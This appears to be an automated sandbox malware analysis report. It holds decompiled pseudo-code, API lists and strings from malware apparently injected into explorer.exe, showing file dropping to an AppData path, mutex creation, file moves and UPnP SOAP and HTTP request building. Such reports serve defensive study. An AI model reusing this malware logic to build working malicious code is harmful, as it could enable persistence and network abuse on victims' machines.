								_t209 = _t217 & 0x00000004;
								__eflags = _t217 & 0x00000004;
								if((_t217 & 0x00000004) == 0) {
									__eflags =  *0x411408;
									if( *0x411408 == 0) {
										_t209 = _v100;
										E003FC320(_v100, _v100);
										_t267 = _t267 + 4;
									}
								} else {
									E003FC2C0(_t209, _v100);
									E003FC320(_t209, _v100);
									_t267 = _t267 + 8;
								}
							}
							__eflags = _v240;
							if(_v240 == 0) {
								L42:
								E003F8FD0(0xe, 0x405286);
								_v796 = 0;
								lstrcpynW( &_v1316, "C:\Windows\explorer.exe", 0x104);
								_v792 = E003F7F40(_t209, 0x5bf);
								lstrcatW( &_v1316, _v792);
								E003F8170( &_v792);
								_v796 = E003F8FF0(_v792, __eflags, 0xa);
								_t147 = E003FE080( &_v1316,  &_v1316);
								_t272 = _t267 + 0x18;
								__eflags = _t147;
								if(_t147 != 0) {
									E003F93B0( &_v1316,  &_v1316, 0);
									_t272 = _t272 + 8;
								}
								__eflags = _v796;
								if(_v796 != 0) {
									E003F8FD0(0xa, _v796);
									_t272 = _t272 + 8;
								}
								_t212 = _a12;
								__eflags =  *(_a12 + 0xc) & 0x00000001;
								if(__eflags != 0) {
									while(1) {
										_t209 = 0;
										__eflags = 0;
										if(0 == 0) {
											goto L60;
										}
									}
									goto L60;
								} else {
									_t155 = E003F8FF0(_t212, __eflags, 0xb);
									_t274 = _t272 + 4;
									__eflags = _t155;
									if(__eflags == 0) {
										_t212 =  *((intOrPtr*)(_a12 + 4));
										E003F3AC0( &_v1324, 7, 0x408818,  *((intOrPtr*)(_a12 + 4)));
										E003F8FD0(0xb,  &_v1324);
										_t274 = _t274 + 0x18;
									}
									E003FF590(_t212, __eflags);
									E003F90E0( &_v72, _v36,  &_v72);
									_t275 = _t274 + 8;
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									_t209 = _v32;
									_t159 = E003FFFD0("C:\Users\Luke\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe", _v32);
									_t272 = _t275 + 8;
									_v96 = _t159;
									__eflags = _v96;
									if(_v96 >= 0) {
										_t237 =  *0x411408; // 0x0
										__eflags = _t237 & 0x00000080;
										if((_t237 & 0x00000080) != 0) {
											L56:
											E003FBFC0(0x2538, 0x64);
											_t272 = _t272 + 8;
											L57:
											goto L60;
										}
										_t161 =  *0x411408; // 0x0
										__eflags = _t161 & 0x00000002;
										if((_t161 & 0x00000002) == 0) {
											goto L57;
										}
										goto L56;
									}
									_v8 = 0xffffffff;
									goto L65;
								}
							} else {
								_t170 = E003FE080(_t209, _v32);
								_t272 = _t267 + 4;
								__eflags = _t170;
								if(_t170 != 0) {
									L60:
									E003FFC40(_t209, _t284, _v100,  &_v72, 0);
									_t264 = _t272 + 0xc;
									__eflags = _a16;
									if(_a16 != 0) {
										lstrcpyW(_a16, _v32);
									}
									__eflags = _a20;
									if(_a20 != 0) {
										lstrcpyA(_a20,  &_v72);
									}
									_v96 = 0;
									_v8 = 0xffffffff;
									L65:
									E003F8C10(1);
									while(1) {
										__eflags = 0;
										if(0 == 0) {
											break;
										}
									}
									 *[fs:0x0] = _v20;
									return _v96;
								}
								goto L42;
							}
						}
						_v776 = 0;
						_t175 = E003FE080(_t209, _v36);
						_t267 = _t267 + 4;
						__eflags = _t175;
						if(_t175 != 0) {
							_t209 = _v36;
							E003F93B0(_v36, _v36,  &_v72);
							_t267 = _t267 + 8;
							_v776 = 1;
						}
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t176 = _a12;
						__eflags =  *((intOrPtr*)(_t176 + 4)) - 2;
						if( *((intOrPtr*)(_t176 + 4)) != 2) {
							goto L35;
						}
						__eflags = _v240;
						if(__eflags != 0) {
							L23:
							_t177 = E003F94A0(_t209, 0, __eflags, 2, 0x384);
							_t267 = _t267 + 8;
							__eflags = _t177;
							if(_t177 != 0) {
								goto L35;
							}
							_v780 = 0;
							while(1) {
								_t209 = 0;
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_t178 = E003F3EE0(0, 0x400);
							_t267 = _t267 + 4;
							_v780 = _t178;
							__eflags = _v780;
							if(_v780 != 0) {
								__eflags = _v240;
								if(_v240 == 0) {
									_t179 = E003F8060(0, 0x24e4);
									_t278 = _t267 + 4;
									_v788 = _t179;
									__eflags = _v788;
									if(_v788 != 0) {
										_push(_a8);
										E003F3AC0(_v780, 0x400, _v788, _v36);
										_push(_v780);
										__eflags = _a12 + 0x14;
										_t209 =  &_v92;
										E003FFDE0(_t284,  &_v92, _a12 + 0x14, 0);
										E003F8170( &_v788);
										_t278 = _t278 + 0x28;
									}
								} else {
									_t188 = E003F8060(0, 0x1bf5);
									_t278 = _t267 + 4;
									_v784 = _t188;
									__eflags = _v784;
									if(_v784 != 0) {
										_push(_a8);
										E003F3AC0(_v780, 0x400, _v784,  &_v72);
										_push(_v780);
										_t209 = _a12 + 0x14;
										__eflags = _a12 + 0x14;
										E003FFDE0(_t284,  &_v92, _a12 + 0x14, 1);
										E003F8170( &_v784);
										_t278 = _t278 + 0x28;
									}
								}
								E003F3F10( &_v780, 0);
								_t267 = _t278 + 8;
							}
							goto L35;
						}
						__eflags = _v776;
						if(__eflags == 0) {
							goto L35;
						}
						goto L23;
					}
					_v96 = 0xfffffffe;
					_v8 = 0xffffffff;
				} else {
					goto L4;
				}
				goto L65;
				L4:
				__eflags = 0;
				if(0 == 0) {
					_v96 = 0xffffffff;
					_v8 = 0xffffffff;
					goto L65;
				} else {
					goto L4;
				}
			}

0x003fef00
0x003fef03
0x003fef05
0x003fef0a
0x003fef15
0x003fef16
0x003fef1d
0x003fef26
0x003fef29
0x003fef30
0x003fef37
0x003fef3e
0x003fef45
0x003fef4c
0x003fef53
0x003fef5d
0x003fef67
0x003fef67
0x003fef7d
0x003fef82
0x003fef85
0x003fef87
0x003fefae
0x003fefc1
0x003fefdb
0x003ff001
0x003ff006
0x003ff009
0x003ff009
0x003ff00b
0x00000000
0x00000000
0x003ff00d
0x003ff011
0x003ff019
0x003ff01e
0x003ff032
0x003ff037
0x003ff03a
0x003ff03d
0x003ff041
0x003ff056
0x003ff05e
0x003ff05f
0x003ff070
0x003ff073
0x003ff07b
0x003ff07c
0x003ff085
0x003ff08a
0x003ff08d
0x003ff090
0x003ff090
0x003ff092
0x00000000
0x00000000
0x003ff094
0x003ff09a
0x003ff09f
0x003ff0a2
0x003ff0a8
0x003ff0ae
0x003ff0ae
0x003ff0b1
0x003ff24b
0x003ff24b
0x003ff252
0x003ff254
0x003ff25a
0x003ff25a
0x003ff25d
0x003ff279
0x003ff280
0x003ff282
0x003ff286
0x003ff28b
0x003ff28b
0x003ff25f
0x003ff263
0x003ff26f
0x003ff274
0x003ff274
0x003ff25d
0x003ff28e
0x003ff295
0x003ff2ab
0x003ff2b2
0x003ff2ba
0x003ff2d5
0x003ff2e8
0x003ff2fc
0x003ff309
0x003ff31b
0x003ff328
0x003ff32d
0x003ff330
0x003ff332
0x003ff33d
0x003ff342
0x003ff342
0x003ff345
0x003ff34c
0x003ff357
0x003ff35c
0x003ff35c
0x003ff35f
0x003ff365
0x003ff368
0x003ff414
0x003ff414
0x003ff414
0x003ff416
0x00000000
0x00000000
0x003ff418
0x00000000
0x003ff36e
0x003ff370
0x003ff375
0x003ff378
0x003ff37a
0x003ff37f
0x003ff391
0x003ff3a2
0x003ff3a7
0x003ff3a7
0x003ff3aa
0x003ff3b7
0x003ff3bc
0x003ff3bf
0x003ff3bf
0x003ff3c1
0x00000000
0x00000000
0x003ff3c3
0x003ff3c5
0x003ff3ce
0x003ff3d3
0x003ff3d6
0x003ff3d9
0x003ff3dd
0x003ff3eb
0x003ff3f1
0x003ff3f7
0x003ff403
0x003ff40a
0x003ff40f
0x003ff412
0x00000000
0x003ff412
0x003ff3f9
0x003ff3fe
0x003ff401
0x00000000
0x00000000
0x00000000
0x003ff401
0x003ff3df
0x00000000
0x003ff3df
0x003ff297
0x003ff29b
0x003ff2a0
0x003ff2a3
0x003ff2a5
0x003ff41a
0x003ff424
0x003ff429
0x003ff42c
0x003ff430
0x003ff43a
0x003ff43a
0x003ff440
0x003ff444
0x003ff44e
0x003ff44e
0x003ff454
0x003ff45b
0x003ff49d
0x003ff49f
0x003ff4a7
0x003ff4a7
0x003ff4a9
0x00000000
0x00000000
0x003ff4ab
0x003ff4b3
0x003ff4c0
0x003ff4c0
0x00000000
0x003ff2a5
0x003ff295
0x003ff0b7
0x003ff0c5
0x003ff0ca
0x003ff0cd
0x003ff0cf
0x003ff0d5
0x003ff0d9
0x003ff0de
0x003ff0e1
0x003ff0e1
0x003ff0eb
0x003ff0eb
0x003ff0ed
0x00000000
0x00000000
0x003ff0ef
0x003ff0f1
0x003ff0f4
0x003ff0f8
0x00000000
0x00000000
0x003ff0fe
0x003ff105
0x003ff114
0x003ff11b
0x003ff120
0x003ff123
0x003ff125
0x00000000
0x00000000
0x003ff12b
0x003ff135
0x003ff135
0x003ff135
0x003ff137
0x00000000
0x00000000
0x003ff139
0x003ff140
0x003ff145
0x003ff148
0x003ff14e
0x003ff155
0x003ff15b
0x003ff162
0x003ff1d5
0x003ff1da
0x003ff1dd
0x003ff1e3
0x003ff1ea
0x003ff1ef
0x003ff207
0x003ff215
0x003ff21b
0x003ff21f
0x003ff223
0x003ff232
0x003ff237
0x003ff237
0x003ff164
0x003ff169
0x003ff16e
0x003ff171
0x003ff177
0x003ff17e
0x003ff183
0x003ff19b
0x003ff1a9
0x003ff1af
0x003ff1af
0x003ff1b7
0x003ff1c6
0x003ff1cb
0x003ff1cb
0x003ff1ce
0x003ff243
0x003ff248
0x003ff248
0x00000000
0x003ff155
0x003ff107
0x003ff10e
0x00000000
0x00000000
0x00000000
0x003ff10e
0x003ff043
0x003ff04a
0x00000000
0x00000000
0x00000000
0x00000000
0x003fef89
0x003fef89
0x003fef8b
0x003fef8f
0x003fef96
0x00000000
0x003fef8d
0x00000000
0x003fef8d

APIs

Part of subcall function 003F9590: lstrlenA.KERNEL32(?), ref: 003F9615

Part of subcall function 003FF4D0: lstrlenA.KERNEL32(?), ref: 003FF4E8
Part of subcall function 003FF4D0: lstrcatW.KERNEL32(?,?), ref: 003FF51E
Part of subcall function 003FF4D0: lstrcatW.KERNEL32(?,?), ref: 003FF566

lstrlenA.KERNEL32(?,00000000,?), ref: 003FEFED

Part of subcall function 003F4CB0: lstrlenW.KERNEL32(0040E1A0), ref: 003F4CD8

Part of subcall function 003F4CB0: lstrcatW.KERNEL32(00000000,00000000), ref: 003F4D31

lstrcpynW.KERNEL32(?,C:\Windows\explorer.exe,00000104), ref: 003FF2D5
lstrcatW.KERNEL32(?,?), ref: 003FF2FC

Part of subcall function 003F3AC0: wvnsprintfA.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 003F3AEE
Part of subcall function 003F3AC0: lstrlenA.KERNEL32(00000000), ref: 003F3B12

lstrcpyW.KERNEL32(00000000,?), ref: 003FF43A
lstrcpyA.KERNEL32(?,?), ref: 003FF44E

Strings

C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe, xrefs: 003FF3C9
C:\Windows\explorer.exe, xrefs: 003FF2C9

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcat$lstrcpy$lstrcpynwvnsprintf
String ID: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe$C:\Windows\explorer.exe
API String ID: 2720427607-4121048295
Opcode ID: b6cbdd87af0c63feecdcd646ca24fe504160866360528d6d78ebe0bc8a9a8948
Instruction ID: 08eee6f1e0a65cf2d08ea97bc04f040fe3fdee487328bff149b6b94e447db682
Opcode Fuzzy Hash: b6cbdd87af0c63feecdcd646ca24fe504160866360528d6d78ebe0bc8a9a8948
Instruction Fuzzy Hash: FBE191B5D0030CAFDB16DB90DC46BFE7378AF44704F048569EB096A282EB759A45CFA1

Uniqueness

Uniqueness Score: 100.00%

Function 0150AB40, Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 253
UNIQUE

Download Yara Rule

C-Code - Quality: 70%

			E0150AB40(void* __eflags, int _a4, char* _a8, intOrPtr _a12, int _a16, int* _a20, intOrPtr* _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				char _v92;
				char _v2140;
				char _v2144;
				char _v2276;
				char* _v2280;
				intOrPtr _v2284;
				int _v2288;
				int _v2292;
				intOrPtr _t120;
				void* _t129;
				int _t138;
				int _t146;
				int _t151;
				int _t208;
				int _t211;
				void* _t239;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t244;

				_v8 = 0;
				 *_a24 = 0;
				_push(_a16);
				E01513C30( &_v2276, 0x80, "%s#%s", _a12);
				_t241 = _t240 + 0x14;
				if(_a20 != 0) {
					_push(_a12);
					_t120 = E01513C30( &_v2140, 0x800, "<?xml version=\"1.0\"?>\r\n<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:%s xmlns:u=\"%s\">", _a16);
					_t242 = _t241 + 0x14;
					_v2284 = _t120;
					_v2280 = _t239 + _v2284 - 0x858;
					while(1) {
						__eflags =  *_a20;
						if( *_a20 == 0) {
							break;
						}
						__eflags =  &_v92 -  &(_v2280[0x64]);
						if( &_v92 >  &(_v2280[0x64])) {
							 *_v2280 = 0x3c;
							_t146 =  &(_v2280[1]);
							__eflags = _t146;
							_v2280 = _t146;
							_v2292 =  *_a20;
							while(1) {
								__eflags =  *_v2292;
								if( *_v2292 == 0) {
									break;
								}
								 *_v2280 =  *_v2292;
								_v2280 =  &(_v2280[1]);
								_v2292 = _v2292 + 1;
							}
							 *_v2280 = 0x3e;
							_v2280 =  &(_v2280[1]);
							_v2288 = _a20[1];
							__eflags = _v2288;
							if(_v2288 == 0) {
								L12:
								 *_v2280 = 0x3c;
								_v2280 =  &(_v2280[1]);
								 *_v2280 = 0x2f;
								_t151 =  &(_v2280[1]);
								__eflags = _t151;
								_v2280 = _t151;
								_v2292 =  *_a20;
								while(1) {
									__eflags =  *_v2292;
									if( *_v2292 == 0) {
										break;
									}
									 *_v2280 =  *_v2292;
									_v2280 =  &(_v2280[1]);
									_v2292 = _v2292 + 1;
								}
								 *_v2280 = 0x3e;
								_v2280 =  &(_v2280[1]);
								_a20 =  &(_a20[2]);
								continue;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								__eflags =  *_v2288;
								if( *_v2288 == 0) {
									goto L12;
								}
								 *_v2280 =  *_v2288;
								_v2280 =  &(_v2280[1]);
								_v2288 = _v2288 + 1;
							}
							goto L12;
						}
						return 0;
					}
					 *_v2280 = 0x3c;
					_v2280 =  &(_v2280[1]);
					 *_v2280 = 0x2f;
					_v2280 =  &(_v2280[1]);
					 *_v2280 = 0x75;
					_v2280 =  &(_v2280[1]);
					 *_v2280 = 0x3a;
					_t208 =  &(_v2280[1]);
					__eflags = _t208;
					_v2280 = _t208;
					_v2292 = _a16;
					while(1) {
						__eflags =  *_v2292;
						if( *_v2292 == 0) {
							break;
						}
						 *_v2280 =  *_v2292;
						_v2280 =  &(_v2280[1]);
						_v2292 = _v2292 + 1;
					}
					_t211 =  &_v92 - _v2280;
					__eflags = _t211;
					strncpy(_v2280, "></s:Body></s:Envelope>\r\n", _t211);
					_t243 = _t242 + 0xc;
					L20:
					_t129 = E0150DC40(_a8,  &_v92,  &_v8,  &_v2144, 0);
					_t244 = _t243 + 0x14;
					if(_t129 != 0) {
						__eflags = _a4;
						if(__eflags >= 0) {
							L25:
							_v12 = E0150E1F0(_a4, _v2144,  &_v92, _v8 & 0x0000ffff,  &_v2276,  &_v2140, _a28);
							__eflags = _v12;
							if(_v12 > 0) {
								_v16 = E0150D3C0(_a4, _a4, _a24);
								__imp__#3(_a4);
								return _v16;
							}
							__imp__#3(_a4);
							return 0;
						}
						_t138 = E0150E350(__eflags,  &_v92, _v8 & 0x0000ffff, 0);
						_t244 = _t244 + 0xc;
						_a4 = _t138;
						__eflags = _a4;
						if(_a4 >= 0) {
							goto L25;
						}
						return 0;
					}
					return 0;
				}
				_push(_a16);
				_push(_a12);
				E01513C30( &_v2140, 0x800, "<?xml version=\"1.0\"?>\r\n<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:%s xmlns:u=\"%s\"></u:%s></s:Body></s:Envelope>\r\n", _a16);
				_t243 = _t241 + 0x18;
				goto L20;
			}

0x0150ab4b
0x0150ab52
0x0150ab5b
0x0150ab71
0x0150ab76
0x0150ab7d
0x0150abac
0x0150abc2
0x0150abc7
0x0150abca
0x0150abdd
0x0150abe3
0x0150abe6
0x0150abe9
0x00000000
0x00000000
0x0150abfb
0x0150abfd
0x0150ac0c
0x0150ac15
0x0150ac15
0x0150ac18
0x0150ac23
0x0150ac29
0x0150ac32
0x0150ac34
0x00000000
0x00000000
0x0150ac44
0x0150ac4f
0x0150ac5e
0x0150ac5e
0x0150ac6c
0x0150ac78
0x0150ac84
0x0150ac8a
0x0150ac91
0x0150acd0
0x0150acd6
0x0150ace2
0x0150acee
0x0150acf7
0x0150acf7
0x0150acfa
0x0150ad05
0x0150ad0b
0x0150ad14
0x0150ad16
0x00000000
0x00000000
0x0150ad26
0x0150ad31
0x0150ad40
0x0150ad40
0x0150ad4e
0x0150ad5a
0x0150ad66
0x00000000
0x00000000
0x00000000
0x00000000
0x0150ac93
0x0150ac93
0x0150ac9c
0x0150ac9e
0x00000000
0x00000000
0x0150acae
0x0150acb9
0x0150acc8
0x0150acc8
0x00000000
0x0150ac93
0x00000000
0x0150abff
0x0150ad74
0x0150ad80
0x0150ad8c
0x0150ad98
0x0150ada4
0x0150adb0
0x0150adbc
0x0150adc5
0x0150adc5
0x0150adc8
0x0150add1
0x0150add7
0x0150ade0
0x0150ade2
0x00000000
0x00000000
0x0150adf2
0x0150adfd
0x0150ae0c
0x0150ae0c
0x0150ae17
0x0150ae17
0x0150ae2a
0x0150ae2f
0x0150ae32
0x0150ae47
0x0150ae4c
0x0150ae51
0x0150ae5a
0x0150ae5e
0x0150ae80
0x0150aeae
0x0150aeb1
0x0150aeb5
0x0150aed5
0x0150aedc
0x00000000
0x0150aee2
0x0150aebb
0x00000000
0x0150aec1
0x0150ae6b
0x0150ae70
0x0150ae73
0x0150ae76
0x0150ae7a
0x00000000
0x00000000
0x00000000
0x0150ae7c
0x00000000
0x0150ae53
0x0150ab82
0x0150ab86
0x0150ab9c
0x0150aba1
0x00000000

Strings

%s#%s, xrefs: 0150AB60
<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:%s xmlns:u="%s">, xrefs: 0150ABB1
></s:Body></s:Envelope>, xrefs: 0150AE1E
<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:%s xmlns:u="%s"></u:%s></s:Body></s:Envelope>, xrefs: 0150AB8B

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlenwvnsprintf
String ID: %s#%s$<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:%s xmlns:u="%s">$<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:%s xmlns:u="%s"></u:%s></s:Body></s:Envelope>$></s:Body></s:Envelope>
API String ID: 2493448318-2115072228
Opcode ID: cab788d5f0f3b022bde33464f6a0cf1805aa1d0be16e1409ab2259f5a1e865bc
Instruction ID: 9ffb3e404ef36d7fa5a3c14aa71c4fbf20521cd7d7b83f03ac077f60176bfa69
Opcode Fuzzy Hash: cab788d5f0f3b022bde33464f6a0cf1805aa1d0be16e1409ab2259f5a1e865bc
Instruction Fuzzy Hash: 62C10B759002999FCB25CF58C980BEDBBF5BF49304F1894DAD589AB341DA31AA80DF90

Uniqueness

Uniqueness Score: 100.00%

Function 0150DFF0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124UNIQUE

Download Yara Rule

APIs

Part of subcall function 0150E350: memset.MSVCRT(?,00000000,00000020), ref: 0150E361
Part of subcall function 0150E350: memcmp.MSVCRT(00000001,%25,00000003), ref: 0150E429
Part of subcall function 0150E350: getaddrinfo.WS2_32(?,?,00000008,?), ref: 0150E47F

#6.WS2_32(00000000,?,00000080), ref: 0150E049
GetVersionExA.KERNEL32(0000009C), ref: 0150E0B3
#19.WS2_32(00000000,?,00000000,00000000), ref: 0150E11B
#3.WS2_32(00000000), ref: 0150E134

Strings

GET %s HTTP/%sHost: %s:%dConnection: CloseUser-Agent: Microsoft-Windows/%u.%u UPnP/1.0, xrefs: 0150E0D8

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Versiongetaddrinfomemcmpmemset
String ID: GET %s HTTP/%sHost: %s:%dConnection: CloseUser-Agent: Microsoft-Windows/%u.%u UPnP/1.0
API String ID: 3951531283-4186078409
Opcode ID: 4d11d7fd47659553c4744b5e78b1074db97a83653e281b3d9611a486d76caae6
Instruction ID: 687695be242dec0dc98ee141a07dca3b124d75bcafb2c73025534ef2d2502d55
Opcode Fuzzy Hash: 4d11d7fd47659553c4744b5e78b1074db97a83653e281b3d9611a486d76caae6
Instruction Fuzzy Hash: 7C414E75900219EBDB25DF94D895BEEB7F8FF48300F108998E5059B284DA349A85CFA0

Uniqueness

Uniqueness Score: 100.00%

Function 01507655, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115
fileUNIQUE

Download Yara Rule

C-Code - Quality: 71%

			E01507655(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				signed int _v8;
				char _v16;
				short _v540;
				void* __esi;
				signed int _t15;
				void* _t20;
				void* _t25;
				void* _t29;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t49;
				void* _t50;
				void* _t52;
				void* _t55;
				void* _t58;
				void* _t60;
				void* _t62;
				intOrPtr* _t63;
				void* _t74;

				_t74 = __fp0;
				_t58 = __edx;
				_v8 = _v8 & 0x00000000;
				_t42 = 1;
				_t15 = E01515B10(__ecx, __eflags, 0x31);
				_pop(_t44);
				if(_t15 != 0) {
					_push(0);
					_push(E015191E0());
					_push(L"\\c");
					_t15 = E01516F50("C:\Users\Luke\AppData\Roaming\Microsoft\Eacrrvkown");
					_t63 = _t62 + 0x10;
					_v8 = _t15;
					if(_t15 != 0) {
						while(1) {
							_t60 = E01518810(_t44, "fgqdktxcpaojumkkyxeblofhtfblum", 0x1388);
							_pop(_t46);
							if(_t60 == 0) {
								break;
							}
							_t20 = E0151BCE0(_t46, _v8);
							_pop(_t49);
							_t68 = _t20;
							if(_t20 == 0) {
								_t36 = E01515FC0(_t49, _t58, _t68, 0x2b, 0x93a80);
								_pop(_t55);
								_t69 = _t36;
								if(_t36 == 0) {
									E01506E1D(_t58, _t74);
									E01516070(_t58, _t69, 0x2b);
									 *_t63 = 0x1538b44;
									E01515C00(_t55);
									_t55 = 0;
								}
								_t42 = E01519BA0(_t55, _t74, _v8);
							}
							E015188D0(_t60);
							_pop(_t50);
							CloseHandle(_t60);
							_t70 = _t42;
							if(_t42 <= 0) {
								break;
							} else {
								E01514080( &_v16);
								_t25 = E01515B10(_t50, _t70, 0x33);
								_pop(_t52);
								_t71 = _t25;
								if(_t25 != 0) {
									L13:
									__eflags = E0150327D(_t52, _t58, _t60, __eflags, _t74, _v8);
									if(__eflags < 0) {
										break;
									}
									E0151BB80(__eflags, _t74, _v8);
									_pop(_t44);
									DeleteFileW(_v8);
									continue;
								}
								_t29 = E01515B10(_t52, _t71, 0x12);
								_pop(_t44);
								if(_t29 != 0 || E01520250(_t44) != 0) {
									_push(E01514080(0));
									E01513CA0( &_v540, 0x104, L"%s.%u", _v8);
									_t63 = _t63 + 0x18;
									MoveFileW(_v8,  &_v540);
									continue;
								} else {
									goto L13;
								}
							}
						}
						return E01513990( &_v8, 0xfffffffe);
					}
				}
				return _t15;
			}

0x01507655
0x01507655
0x0150765e
0x01507667
0x01507668
0x0150766d
0x01507670
0x01507676
0x0150767d
0x0150767e
0x01507688
0x0150768d
0x01507690
0x01507695
0x0150769c
0x015076ab
0x015076ae
0x015076b1
0x00000000
0x00000000
0x015076ba
0x015076bf
0x015076c0
0x015076c2
0x015076cb
0x015076d1
0x015076d2
0x015076d4
0x015076d6
0x015076dd
0x015076e2
0x015076eb
0x015076f1
0x015076f1
0x015076fb
0x015076fb
0x015076fe
0x01507703
0x01507705
0x0150770b
0x0150770d
0x00000000
0x01507713
0x01507717
0x0150771e
0x01507724
0x01507725
0x01507727
0x01507777
0x01507780
0x01507782
0x00000000
0x00000000
0x01507787
0x0150778c
0x01507790
0x00000000
0x01507790
0x0150772b
0x01507730
0x01507733
0x01507745
0x0150775a
0x0150775f
0x0150776c
0x00000000
0x00000000
0x00000000
0x00000000
0x01507733
0x0150770d
0x00000000
0x015077a8
0x01507695
0x015077ab

APIs

Part of subcall function 01516F50: lstrlenW.KERNEL32(?), ref: 01516F78

Part of subcall function 01518810: CreateMutexA.KERNEL32(00000000,00000001,00000000,015053AB,?,015070A4,00000000,00000001,00080000,00000000,?,?,01505609,015053AB,00000000,00000000), ref: 01518823

Part of subcall function 0151BCE0: GetFileAttributesW.KERNEL32(01515C49,?,?,01515C49,00000000), ref: 0151BCE8

CloseHandle.KERNEL32(00000000), ref: 01507705
MoveFileW.KERNEL32(00000000,?), ref: 0150776C
DeleteFileW.KERNEL32(00000000), ref: 01507790

Strings

jkfkdm, xrefs: 015076E2
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown, xrefs: 01507683
%s.%u, xrefs: 0150774F
fgqdktxcpaojumkkyxeblofhtfblum, xrefs: 015076A1

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: File$AttributesCloseCreateDeleteHandleMoveMutexlstrlen
String ID: %s.%u$C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown$fgqdktxcpaojumkkyxeblofhtfblum$jkfkdm
API String ID: 2869897529-897087572
Opcode ID: e4dfc3d8ee0011cb02618765b4f84f90ffffc3271902c19f212fed0e8462f59f
Instruction ID: f9b6f6628f9649b6d8022818fa7a6805ca1ee0ac57093de375c4d36d140e055c
Opcode Fuzzy Hash: e4dfc3d8ee0011cb02618765b4f84f90ffffc3271902c19f212fed0e8462f59f
Instruction Fuzzy Hash: 0631F572A0430B7AFB177AF4AD56F5E776CBF952A0F200029F640AD0C4EF60AA409655

Uniqueness

Uniqueness Score: 100.00%

Function 0151BA80, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
fileCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E0151BA80(void* __fp0, WCHAR* _a4, WCHAR* _a8) {
				int _v8;
				void _v530;
				short _v532;
				int _t28;
				short _t39;
				void* _t52;

				_t52 = __fp0;
				_v8 = 0;
				if(CopyFileW(_a4, _a8, 0) != 0) {
					DeleteFileW(_a4);
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							goto L21;
						}
					}
				} else {
					_t39 =  *0x152a6e0; // 0x0
					_v532 = _t39;
					memset( &_v530, 0, 0x206);
					while(0 != 0) {
					}
					_push(E015156D0(0, _t52, 0x15394fc, 1, 0xf4240));
					E01513CA0( &_v532, 0x207, L"%S.%06d", _a8);
					if(MoveFileW(_a8,  &_v532) != 0) {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t28 = CopyFileW(_a4, _a8, 0);
						__eflags = _t28;
						if(_t28 != 0) {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							DeleteFileW(_a4);
						} else {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_v8 = 0xffffffff;
						}
					} else {
						while(0 != 0) {
						}
						_v8 = 0xffffffff;
					}
				}
				L21:
				return _v8;
			}

0x0151ba80
0x0151ba89
0x0151baa2
0x0151bb67
0x0151bb6d
0x0151bb6d
0x0151bb6f
0x00000000
0x00000000
0x0151bb71
0x0151baa8
0x0151baa8
0x0151baaf
0x0151bac4
0x0151bacc
0x0151bad0
0x0151bae6
0x0151bafc
0x0151bb17
0x0151bb28
0x0151bb28
0x0151bb2a
0x00000000
0x00000000
0x0151bb2c
0x0151bb38
0x0151bb3e
0x0151bb40
0x0151bb51
0x0151bb51
0x0151bb53
0x00000000
0x00000000
0x0151bb55
0x0151bb5b
0x0151bb42
0x0151bb42
0x0151bb42
0x0151bb44
0x00000000
0x00000000
0x0151bb46
0x0151bb48
0x0151bb48
0x0151bb19
0x0151bb19
0x0151bb1d
0x0151bb1f
0x0151bb1f
0x0151bb61
0x0151bb73
0x0151bb79

APIs

